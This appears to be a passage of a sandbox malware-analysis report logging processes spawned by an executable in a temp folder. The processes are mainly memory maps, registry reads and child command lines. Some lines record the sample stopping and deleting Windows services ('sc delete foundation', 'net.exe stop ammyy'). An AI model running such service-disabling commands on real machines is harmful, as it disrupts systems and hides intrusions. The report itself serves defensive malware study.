user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (11)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Get Info net.exe type = file_attributes False 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\net.exe os_pid = 0x540, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4abe0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:12 (UTC) True 1
Get Time type = Ticks, time = 10926575 True 1
Environment (17)
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000002 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #13: cmd.exe
55 0
Information Value
ID #13
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /C sc delete foundation
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:25
OS Process Information
Information Value
PID 0xbc0
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BB4
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False -
private_0x00000000000e0000 0x000e0000 0x001dffff Private Memory Readable, Writable True False False -
locale.nls 0x001e0000 0x00246fff Memory Mapped File Readable False False False -
private_0x0000000000280000 0x00280000 0x002fffff Private Memory Readable, Writable True False False -
private_0x00000000003a0000 0x003a0000 0x0049ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000004a0000 0x004a0000 0x00627fff Pagefile Backed Memory Readable True False False -
private_0x0000000000630000 0x00630000 0x0063ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000640000 0x00640000 0x007c0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007d0000 0x007d0000 0x01bcffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001bd0000 0x01bd0000 0x01f12fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01f20000 0x021eefff Memory Mapped File Readable False False False -
cmd.exe 0x4abe0000 0x4ac2bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x74bc0000 0x74bc6fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\qj4SUKboE\Desktop type = file_attributes True 2
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\sc.exe os_pid = 0x938, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4abe0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75440000 True 2
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x7546a84f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75473b92 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75454a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7546a79d True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:13 (UTC) True 1
Get Time type = Ticks, time = 10926778 True 1
Environment (17)
Operation Additional Information Success Count Logfile
Get Environment String - True 6
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Get Environment String name = PROMPT, result_out = $P$G True 1
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Get Environment String name = KEYS False 1
Set Environment String name = =C:, value = C:\Users\qj4SUKboE\Desktop True 1
Set Environment String name = COPYCMD True 1
Set Environment String name = =ExitCode, value = 00000424 True 1
Set Environment String name = =ExitCodeAscii True 1
Process #14: net.exe
0 0
Information Value
ID #14
File Name c:\windows\syswow64\net.exe
Command Line net.exe stop ammyy
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:13, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:25
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x8d8
Parent PID 0xb84 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B68
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000170000 0x00170000 0x001effff Private Memory Readable, Writable True False False -
private_0x0000000000280000 0x00280000 0x002fffff Private Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x0048ffff Private Memory Readable, Writable True False False -
net.exe 0x00510000 0x00527fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000720000 0x00720000 0x0072ffff Private Memory Readable, Writable True False False -
winnsi.dll 0x73df0000 0x73df6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73e00000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x73e20000 0x73e31fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x73e40000 0x73e4efff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73e50000 0x73e68fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x73e70000 0x73e7efff Memory Mapped File Readable, Writable, Executable False False False -
browcli.dll 0x73e80000 0x73e8cfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x74bb0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #15: net.exe
0 0
Information Value
ID #15
File Name c:\windows\syswow64\net.exe
Command Line net.exe stop foundation
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:24
Remarks No high level activity detected in monitored regions
OS Process Information
Information Value
PID 0x540
Parent PID 0xbac (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4F4
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
private_0x00000000001a0000 0x001a0000 0x001dffff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x002bffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0044ffff Private Memory Readable, Writable True False False -
net.exe 0x00510000 0x00527fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000640000 0x00640000 0x0073ffff Private Memory Readable, Writable True False False -
private_0x0000000000900000 0x00900000 0x0090ffff Private Memory Readable, Writable True False False -
winnsi.dll 0x73df0000 0x73df6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x73e00000 0x73e1bfff Memory Mapped File Readable, Writable, Executable False False False -
mpr.dll 0x73e20000 0x73e31fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x73e40000 0x73e4efff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73e50000 0x73e68fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x73e70000 0x73e7efff Memory Mapped File Readable, Writable, Executable False False False -
browcli.dll 0x73e80000 0x73e8cfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x74bb0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Process #16: net1.exe
17 0
Information Value
ID #16
File Name c:\windows\syswow64\net1.exe
Command Line C:\Windows\system32\net1 stop foundation
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:24
OS Process Information
Information Value
PID 0xb0
Parent PID 0x540 (c:\windows\syswow64\net.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 950
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
net1.exe 0x00080000 0x000a9fff Memory Mapped File Readable, Writable, Executable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0027ffff Private Memory Readable, Writable True False False -
private_0x0000000000310000 0x00310000 0x0031ffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x006bffff Private Memory Readable, Writable True False False -
ntdsapi.dll 0x739f0000 0x73a07fff Memory Mapped File Readable, Writable, Executable False False False -
samlib.dll 0x73a10000 0x73a21fff Memory Mapped File Readable, Writable, Executable False False False -
netapi32.dll 0x73a30000 0x73a40fff Memory Mapped File Readable, Writable, Executable False False False -
netmsg.dll 0x73d90000 0x73d91fff Memory Mapped File Readable, Writable, Executable False False False -
logoncli.dll 0x73db0000 0x73dd1fff Memory Mapped File Readable, Writable, Executable False False False -
dsrole.dll 0x73de0000 0x73de8fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x73e40000 0x73e4efff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73e50000 0x73e68fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x73e70000 0x73e7efff Memory Mapped File Readable, Writable, Executable False False False -
browcli.dll 0x73e80000 0x73e8cfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x74bb0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75cc0000 0x75cf4fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
